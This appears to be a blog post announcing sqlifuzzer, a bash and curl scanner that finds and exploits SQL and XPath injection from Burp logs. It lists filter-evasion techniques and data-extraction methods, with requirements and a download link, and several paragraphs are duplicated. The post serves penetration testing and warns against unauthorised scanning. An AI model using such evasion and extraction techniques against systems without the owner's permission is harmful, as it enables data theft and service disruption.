Sqlifuzzer is a command line scanner that seeks to identify SQL injection vulnerabilities. It parses Burp logs to create a list of fuzzable requests... then fuzzes them.
What is sqlifuzzer?
It's a wrapper for curl written in bash. It's also a tool that can be used to remotely identify SQL (and XPath) injection vulnerabilities. It does this by sending a range of injection payloads and examining the responses for signs of 'injectability'. If a parameter appears to be vulnerable, sqlifuzzer sends exploit payloads to extract data.
Like almost all web app scanners, sqlifuzzer includes OR 1=1 payloads; this means that there is a significant risk of data destruction, Denial of Service, and/or other undesirable implications for any host (or intermediary device) scanned using sqlifuzzer. sqlifuzzer is beta; don't use it in an environment that matters to you or anyone else. Do not use sqlifuzzer to scan hosts without the owner's permission.
It's a wrapper for curl written in bash. It's also a tool that can be used to remotely identify SQL (and XPath) injection vulnerabilities. It does this by sending a range of injection payloads and examining the responses for signs of 'injectability'. If a parameter appears to be vulnerable, sqlifuzzer sends exploit payloads to extract data.
Like almost all web app scanners, sqlifuzzer includes OR 1=1 payloads; this means that there is a significant risk of data destruction, Denial of Service, and/or other undesirable implications for any host (or intermediary device) scanned using sqlifuzzer. sqlifuzzer is beta; don't use it in an environment that matters to you or anyone else. Do not use sqlifuzzer to scan hosts without the owner's permission.
Features
- Payloads/tests for numeric, string, error and time-based SQL injection
- Support for MSSQL, MYSQL and Oracle DBMS's
- Automated testing of 'tricky' parameters like POST URL query and mulipart form parameters
- A range of filter evasion options:
- case variation, nesting, double URL encoding, comments for spaces, 'like' for 'equals' operator, intermediary characters, null and CRLF prefixes, HTTP method swapping (GETs become POSTs / POSTs become GETs)
- ORDER BY and UNION SELECT tests on vulnerable parameters to:
- enumerate select query column numbers
- identify data-type string columns in select queries
- extract database schema and configuration information
- Conditional tests to extract DBMS info when data extraction via UNION SELECT fails (i.e. no string type columns)
- Time delay based tests to extract DBMS info when data extraction via conditional methods fails (i.e. fully blind scenarios)
- Boolean response-based XPath injection testing and data extraction
- Support for automated detection and testing of parameters in POST URIs and multipart forms
- Scan 'state' maintenance:
- Halt a scan at any time - scan progress is saved and you can easily resume a scan from the URL where you stopped
- Specify a specific request number to resume a scan from
- Optional exclusion of a customizable list of parameters from scanning scope
- Tracking of parameters scanned and avoidance of re-scanning scanned parameters
- HTML format output with:
- links/buttons to send Proof of Concept SQL injection requests
- links to response difference files and to extracted data
What do I need to use sqlifuzzer?
sqlifuzzer is built and tested on BackTrack 5 R2 and should run on most BackTrack versions with no tweaks required. On all other platforms Your Mileage May Vary; you will need a an OS that can support bash (*nix, cygwin (not tested), etc), curl must be installed and in your path, and 'replace' (which is missing from Ubuntu) must also be installed in in your path. Until I implement web spider functionality, sqlifuzzer is dependant upon burp proxy (http://portswigger.net) to create log files (not burp state files) which sqlifuzzer uses to build its internal list of fuzz requests. The free version of burp can be used to create these log files. Within Burp go to options > misc and check the proxy requests tick box; browse the target site, populate your log, then pass it to sqlifuzzer.
Changelog V0.5l :
sqlifuzzer is built and tested on BackTrack 5 R2 and should run on most BackTrack versions with no tweaks required. On all other platforms Your Mileage May Vary; you will need a an OS that can support bash (*nix, cygwin (not tested), etc), curl must be installed and in your path, and 'replace' (which is missing from Ubuntu) must also be installed in in your path. Until I implement web spider functionality, sqlifuzzer is dependant upon burp proxy (http://portswigger.net) to create log files (not burp state files) which sqlifuzzer uses to build its internal list of fuzz requests. The free version of burp can be used to create these log files. Within Burp go to options > misc and check the proxy requests tick box; browse the target site, populate your log, then pass it to sqlifuzzer.
Changelog V0.5l :
Improved time delay testing, payload tweaks, added evasion.txt payload list.
Download : sqlifuzzer-0.5l.tgz (58.9 KB)
Find Other Version
For more information : http://code.google.com/p/sqlifuzzer/
Find Other Version
For more information : http://code.google.com/p/sqlifuzzer/
0 comments:
Post a Comment